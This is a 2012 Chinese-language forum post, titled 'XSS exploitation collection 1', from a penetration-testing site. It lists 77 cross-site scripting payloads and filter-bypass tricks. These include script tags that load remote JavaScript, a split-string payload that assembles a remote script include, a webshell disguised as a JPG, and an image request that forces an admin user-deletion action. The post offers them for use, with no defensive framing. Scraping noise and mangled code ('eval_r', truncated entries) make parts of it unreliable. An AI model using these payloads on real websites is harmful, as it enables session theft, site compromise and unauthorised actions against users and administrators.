中国网络渗透测试联盟
标题:
xss详细利用大全1
[打印本页]
作者:
admin
时间:
2012-9-13 17:04
标题:
xss详细利用大全1
跨站图片shell
! L$ l+ Z2 v& U1 \
XSS跨站代码 <script>alert("")</script>
2 n7 {( J- j5 [
; t/ a b: t2 E; S- N
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
$ r+ M8 Y0 T) A6 ]
* X3 s: `1 [! W
- k8 ]# P7 X. g# P3 f1 X
0 D* j, d, T* t1 r7 a
1)普通的XSS JavaScript注入
% b( x/ C6 f }) J: N% h7 s6 m6 ~
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
: ^' A* T( u* q
0 ~3 l6 \ [ X6 y% S- h5 F: s
(2)IMG标签XSS使用JavaScript命令
9 O0 \) n4 w& ?3 n2 O, q
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
( \! ~4 y% ^% v- w5 s9 a
# l- H2 r; I" ^0 E4 L$ S
(3)IMG标签无分号无引号
. c& H) C3 J0 W$ W V' }
<IMG SRC=javascript:alert(‘XSS’)>
0 o1 N% w% M; c! M
$ [7 @0 O5 T$ ~7 G- S; b
(4)IMG标签大小写不敏感
: j- h5 { I5 m2 Z& L1 |' q/ [6 F
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
2 _+ O, m8 r4 g8 H( Q% b* U F% V5 t1 V
c; t: c' ]7 }
(5)HTML编码(必须有分号)
" d& U3 g* L. B
<IMG SRC=javascript:alert(“XSS”)>
+ A6 m- l8 Z$ U( E5 m0 Z
" l& h6 g8 \! A6 |
(6)修正缺陷IMG标签
& k, Z: p2 T. Y+ U8 U G" E
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
8 m8 m1 R& y. e6 @- K+ G6 w
0 [3 d6 ?9 |$ T8 s& v2 E
(7)formCharCode标签(计算器)
7 D+ r* |3 d4 E! i1 p
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
" Q R% ~! @; k' i9 D; T) H2 P6 c
5 d. D+ @' a+ w5 X; M* }; p* q
(8)UTF-8的Unicode编码(计算器)
8 @) S6 U5 f) V- p# ^
<IMG SRC=jav..省略..S')>
( c# K' u% S1 P. J j# V
6 x8 ~- a# E7 |1 z
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
$ q: {4 E" ]" ~3 ^6 j% V1 o- W
<IMG SRC=jav..省略..S')>
- m& f4 g/ P Q
2 }( G& F6 ?3 l& ?0 w' }# K9 s
(10)十六进制编码也是没有分号(计算器)
$ m o( K4 g5 u2 ]
<IMG SRC=java..省略..XSS')>
+ E6 X4 D5 c! v' p; E @( ]
+ y4 o# b ~) ^) Y% K
(11)嵌入式标签,将Javascript分开
( ?; E4 O3 y& ^5 F+ J G8 B: v, _- r: @
<IMG SRC=”jav ascript:alert(‘XSS’);”>
5 X7 l( g- X, o& f, ?4 X6 n
# i% d0 F" Q+ h6 w- H, _
(12)嵌入式编码标签,将Javascript分开
! {; x3 ?3 _ ~, Y# i
<IMG SRC=”jav ascript:alert(‘XSS’);”>
! U( E3 a. b0 I( A5 {- \
5 E4 v. o5 d4 T1 `
(13)嵌入式换行符
+ {2 W. r% v, @' ?. P# j* f
<IMG SRC=”jav ascript:alert(‘XSS’);”>
( o: u, U/ k5 N1 t
+ @, X9 }2 |2 b7 o' r- s( R9 \0 O
(14)嵌入式回车
* S3 V: W8 F1 e6 i/ X& q: |
<IMG SRC=”jav ascript:alert(‘XSS’);”>
: x M5 S: c' h( J7 h' k% T& A
3 x" a' _% h4 O5 T7 ^' D2 d/ w
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
' G) y* [9 H! b3 O: c
<IMG SRC=”javascript:alert(‘XSS‘)”>
* A) \0 ]7 I F& \1 k. Y
1 \" E# S) Y" H8 @% p( C g9 Y
(16)解决限制字符(要求同页面)
2 T; o4 z! p1 \ b9 M8 P
<script>z=’document.’</script>
' {5 q" k; V( n) E8 M# i3 w
<script>z=z+’write(“‘</script>
6 n( |. r4 P$ n$ A; D% F
<script>z=z+’<script’</script>
$ L0 r/ ?! A# K! E. `5 {- C4 e
<script>z=z+’ src=ht’</script>
) o8 u: J9 [2 r: V9 |6 s& ]
<script>z=z+’tp://ww’</script>
, a5 N ] T+ f! C+ l
<script>z=z+’w.shell’</script>
0 B' x+ }( M6 S$ S) F: F) [$ v
<script>z=z+’.net/1.’</script>
+ _# k* B% \4 m# t, }3 y2 R+ f% t
<script>z=z+’js></sc’</script>
+ Q+ w5 J2 j2 a6 ]$ f; l" v
<script>z=z+’ript>”)’</script>
' d, w* v C9 i# N8 }: \& e
<script>eval_r(z)</script>
2 \$ h6 |+ m$ M5 l0 w7 a
& z$ b0 Z1 D6 J/ [, P$ c
(17)空字符
& H# e' {* D% G; \/ f! U7 W
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
; ~* p8 P5 F j$ O: q O [, `9 G
3 S& ]" Q3 }* O5 x/ u5 V' y
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
+ i. ?$ V7 j7 Z1 S L" @1 Z
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
$ _% b# n; {$ c) e- _
. [! U: u8 `9 U; z
(19)Spaces和meta前的IMG标签
; \7 J' ]( X3 @. S3 P
<IMG SRC=” javascript:alert(‘XSS’);”>
0 @' l5 E G2 X/ n( c% M! Q Q
2 d4 r9 h9 ?* J' U/ b9 z; v
(20)Non-alpha-non-digit XSS
1 k5 D2 ^9 }/ G7 G7 _. O
<SCRIPT/XSS SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
# K+ E: i+ m2 r) }
2 X) C* V9 T' z! Y" ]* G3 A& l
(21)Non-alpha-non-digit XSS to 2
, Y& e! L$ ~7 Z% e
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
5 I9 A, r2 [, F1 J: ]' O7 Y# z$ w
3 A2 L5 t, u# ]1 A9 I" g
(22)Non-alpha-non-digit XSS to 3
! a6 o, U; ~) R! L8 h. s4 Z5 \6 h
<SCRIPT/SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
8 B: w6 R& c' }2 J! D
; M* q9 n0 Y! h. e- D! M3 k
(23)双开括号
9 R# v9 v% l5 `/ I6 t$ x
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
4 m) J# I6 S6 M n; r* X% p
3 z0 k0 U% S: x g, J0 [* _
(24)无结束脚本标记(仅火狐等浏览器)
3 F- s% k; M0 t
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
' k$ k* y! c5 t" K, h
& G! W7 b4 ~2 Z. X5 V4 G% l- ]
(25)无结束脚本标记2
% a* n; e0 N$ U# ~- j& S
<SCRIPT SRC=//3w.org/XSS/xss.js>
+ _- b% r* _+ P( v- R
8 R) _: |6 J. J! ~9 Q( `3 g% ^/ O
(26)半开的HTML/JavaScript XSS
3 A+ I K/ k& ]0 L' {# h
<IMG SRC=”javascript:alert(‘XSS’)”
1 E% T k0 D$ L2 x1 i/ W# r
) ~' ?) p# l$ j' ?" c
(27)双开角括号
* F' [8 s- N" Q) M' B1 D6 i
<iframe src=http://3w.org/XSS.html <
0 {! F; P R% r
. A' m4 ^9 ] `5 u* _. p4 R# y' J
(28)无单引号 双引号 分号
0 G; Q; w5 p+ H% K
<SCRIPT>a=/XSS/
0 A1 k+ G. Z2 Y5 I% W2 m
alert(a.source)</SCRIPT>
4 e$ v& m1 H6 d8 ~
( C3 q3 L; b: i n( @( u
(29)换码过滤的JavaScript
: ], m2 `3 b4 @; S8 v2 A( Z
\”;alert(‘XSS’);//
% J% V. K1 y( o# h6 K
% R, }' f# \, j6 b. a7 M! R
(30)结束Title标签
* K) w; ^9 n8 q+ @5 \- m1 w' d
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
% n; S* H2 L" E6 U5 Z3 L
) h' S; T+ S. q
(31)Input Image
6 Z- i. t( ~ P1 b6 |
<INPUT SRC=”javascript:alert(‘XSS’);”>
4 x6 K0 c& M) R3 u5 u8 q, Y- @
' r" ]) k% m t5 h2 y0 }) z
(32)BODY Image
0 C/ H% X9 X8 r& R# o. r
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
" N; b' A) v1 l; g" B+ O0 F
. w3 a0 G/ j5 Q* Y) L
(33)BODY标签
# A$ Y' Z! Q& K+ @" D7 f8 L/ [
<BODY(‘XSS’)>
) R# c( e- ?* V; `
- x) C6 N2 o) N a
(34)IMG Dynsrc
" H+ s+ h. |9 `$ w4 R/ G8 q
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
7 _+ e* _/ y2 e; X: k! l
' T( q. x4 U( I3 p# m
(35)IMG Lowsrc
# `2 {$ c1 l @$ `& z/ b8 |( e
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
, L5 t2 C9 m) x0 E% f& T; l
- \7 a. {2 {* F$ U3 F1 c
(36)BGSOUND
. h7 _6 x8 d" T; L1 M7 t" t
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
6 U9 q3 V6 m. ?6 G* a% E8 i' d
. \" q7 I e. E5 C9 i
(37)STYLE sheet
. Q* z$ \7 A' G) T4 n7 X
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
& z5 l4 O: z6 J* r- Q4 l
2 U* I4 u: ~1 r% i/ Q
(38)远程样式表
) R3 y3 N& |( j x$ U
<LINK REL=”stylesheet” HREF=”
http://3w.org/xss.css
”>
7 A" i- l7 N) V% z, x
m9 J& Z3 v4 {( h* _
(39)List-style-image(列表式)
1 c- Y! B; E4 P' o0 w
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
4 T6 o' v! O3 O7 u+ ~* O
, i& k! K7 e. M) ^# R
(40)IMG VBscript
8 d- T+ l: U* K# v
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
& g1 X& }; d) c' `* Q
8 X/ y6 y: n0 `- L9 }. g& s
(41)META链接url
' W8 t D. Z! h7 q+ A
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
: p; l0 i3 |" z* f
V0 s" ^% g- @& ?4 g: O7 n' E
(42)Iframe
, w5 d0 N; i! Q, y2 `- _
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
5 b2 E, ~" |! |, S$ l
(43)Frame
1 A& l1 S6 v- b; q+ k7 h( q/ A
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
( G( r$ C& Y' M- L. U
( J8 p& i5 r( B. y7 C
(44)Table
[8 |% T& }7 X2 f, n9 a7 U5 X$ T
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
: P3 B, ~) h# y* L% }% c
( W- U- O( ~9 j( N8 J, K6 s
(45)TD
0 E6 s! t9 [/ p0 N- |0 c
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
9 M( U$ }. L, A2 P- T* O; }* y n! c
6 `# J5 r* `1 A0 r6 ^8 o$ g5 m
(46)DIV background-image
) s. f% c9 D" c- V' T( T
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
& N; F' A& v& h$ }, R4 ~
- T& P% F9 O3 S# a7 D% A; k
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
, l q! f$ {, I/ a7 p: ^8 k, |
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
7 ]* R1 U- R% y& {0 E! p$ T% A; X x
& A; R4 P$ G t2 W
(48)DIV expression
+ e6 [- }1 ~0 b5 @7 I
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
; Y" J8 E) j* B4 y
3 p1 M$ g3 G& o7 z9 j4 H2 M
(49)STYLE属性分拆表达
* Y. m8 w$ ]! [, V
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
( v2 o0 A: S, g* k
- q( y8 d; k R* q" I+ t& U
(50)匿名STYLE(组成:开角号和一个字母开头)
) k" x3 g# G. e1 {% @* h# i' n
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
) J e3 p) _" K6 P$ T" a
( w% g# w& h# ~0 O. `" L
(51)STYLE background-image
' b+ w- x- {- x4 Y, ~2 m
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
7 U/ R+ T: J a9 P5 b! \" m2 E
" @/ [9 r! {6 i s/ B# L
(52)IMG STYLE方式
; z/ @9 C7 f" w$ w
exppression(alert(“XSS”))’>
, S# _" ? C$ _9 ?+ T6 l: R
% W; m2 A7 H# C# W3 }
(53)STYLE background
$ d; s9 I9 F/ R
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
! [' d# a! E! }3 v+ g) r
0 Y8 {/ ]4 ~" R' q
(54)BASE
8 z7 A$ i* @( z) T# b8 N# ]0 \' Y
<BASE HREF=”javascript:alert(‘XSS’);//”>
$ J7 d3 E" w6 g3 s, N. f6 Y
2 i f2 E" a8 N* T* l
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
( e+ X1 [) t' b2 D t O
<EMBED SRC=”
http://3w.org/XSS/xss.swf
” ></EMBED>
; ?" A8 e8 s# [& e7 F
0 \3 o$ O: {. u9 K8 P
(56)在flash中使用ActionScrpt可以混进你XSS的代码
1 H3 P! B. O% |: L$ h/ @
a=”get”;
Q7 P4 @' N; a' \9 g
b=”URL(\”";
8 W% X* y6 i: t5 S9 m* g
c=”javascript:”;
7 f! F& L; k. J4 v% X- @- E
d=”alert(‘XSS’);\”)”;
1 N% e. H( c. f
eval_r(a+b+c+d);
1 g9 i# w7 B# u. m6 L
- y1 q9 V. M) U0 y6 a- |; C
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
% Z2 [7 q4 n% l/ C
<HTML xmlns:xss>
9 e( b2 C, @0 x
<?import namespace=”xss” implementation=”
http://3w.org/XSS/xss.htc
”>
) B2 \( u5 D7 f9 s4 \
<xss:xss>XSS</xss:xss>
2 R( e0 |" Z/ d: {
</HTML>
0 y# c* N, G) n, X' h" m
_6 L9 q- |/ a) p; g# m e
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
0 n4 j" i9 ?. R4 w B4 Z# ]
<SCRIPT SRC=””></SCRIPT>
) ]) { ~; ~; ?6 |, P
- H2 h) I$ D2 L8 f4 d2 G
(59)IMG嵌入式命令,可执行任意命令
# s7 e+ D2 L2 }* Q) V9 n3 b/ F. o- E
<IMG SRC=”
http://www.XXX.com/a.php?a=b
”>
- ^1 |/ k1 R' a4 j, P4 [6 P
0 e) S/ B% U- z
(60)IMG嵌入式命令(a.jpg在同服务器)
+ l9 z' a) J( l4 j& b3 W
Redirect 302 /a.jpg
http://www.XXX.com/admin.asp&deleteuser
) [# }7 Y8 D. ]) v" x4 k* O8 J4 g
" C' k/ w0 V, O
(61)绕符号过滤
7 f( x. M5 A, p: {
<SCRIPT a=”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
& Q3 @9 K: F. |( P. `
- B) K: n& h8 ?8 w' k5 q
(62)
; f! ?. p' @" j* ~6 a
<SCRIPT =”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
3 o* V: h7 M7 I' ~# T8 {" C
% }, b! ~3 S) R. a5 P+ ^" ]5 \ g
(63)
" h9 e% r) {9 j' h. d
<SCRIPT a=”>” ” SRC=”
http://3w.org/xss.js
”></SCRIPT>
+ c: { z/ G! Q8 {
9 h& F& s* J+ u5 M1 @3 [
(64)
/ T1 A( F; [; G
<SCRIPT “a=’>’” SRC=”
http://3w.org/xss.js
”></SCRIPT>
2 D% D$ i, @) Y4 L8 P$ L
1 s- Z. R8 v2 g4 k
(65)
4 @! m5 H! c: m, `2 ?: u1 i2 ?
<SCRIPT a=`>` SRC=”
http://3w.org/xss.js
”></SCRIPT>
. N4 c5 {. i$ e* n' J
; W( H# s$ s: n8 b4 @
(66)
9 L, r( O4 P. p( X6 {" F
<SCRIPT a=”>’>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
1 b, r1 h3 Z# h
+ i% t8 S! \' X5 r
(67)
: F' Q1 o9 T6 g4 ^
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”
http://3w.org/xss.js
”></SCRIPT>
3 n' B/ U/ z7 n2 Z& j
% \% {9 ^& w8 [( O, k
(68)URL绕行
" Z. o$ T+ I9 ?
<A HREF=”
http://127.0.0.1/
”>XSS</A>
4 W; C0 ]- v3 |- P2 ?. f: O
* i) e* t2 Q0 G7 S
(69)URL编码
0 k2 l1 \. v3 H! e
<A HREF=”
http://3w.org
”>XSS</A>
; I( |! u5 g# W9 E/ k2 c
) m ~5 ^, M) v" r! b& f3 o
(70)IP十进制
% _% C- V* `# s+ h* J1 b
<A HREF=”http://3232235521″>XSS</A>
* j* ]* U: G% {) C3 ^
3 P1 y9 V5 ^, K6 w) v9 J1 I
(71)IP十六进制
+ P8 y) L% \4 v
<A HREF=”
http://0xc0.0xa8.0
×00.0×01″>XSS</A>
3 N) | }1 {0 b$ \3 ]& I: `+ Q3 R
+ J6 }* K" p" x4 X( p# q
(72)IP八进制
; E1 M6 x" J$ x' V5 Q
<A HREF=”
http://0300.0250.0000.0001
″>XSS</A>
' t/ ?/ \: I. P O: b8 S+ ?' a$ M
# ]3 _2 S$ c+ o( |8 w
(73)混合编码
+ H: r" x# h# p, _% i8 m: F% H
<A HREF=”h
. j9 m3 {$ W# Z2 k/ h$ c' e/ F: P" Y
tt p://6 6.000146.0×7.147/”">XSS</A>
+ W# D& j- d: H7 z, y
3 D d5 `% @, J8 P7 S- }
(74)节省[http:]
2 C Y/ o& m: G% y1 n! E) T% a
<A HREF=”//www.google.com/”>XSS</A>
. F: m6 C5 s! u0 `( T1 n% a
2 j$ k# R7 p# g5 A- Q
(75)节省[www]
( |. z; a, ]0 c; [7 P1 O
<A HREF=”
http://google.com/
”>XSS</A>
# x h7 U% S# o/ [2 r% e
& Q5 W4 {8 s+ g3 x
(76)绝对点绝对DNS
9 r2 l4 d0 v$ x+ f2 w7 D
<A HREF=”
http://www.google.com./
”>XSS</A>
) o) p2 T: [. ~- L$ @
) w5 t- x$ W0 L
(77)javascript链接
! `- x5 y7 J6 @' H! c
<A HREF=”javascript:document.location=’
http://www.google.com/
’”>XSS</A>
m& v5 F3 `% Y
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2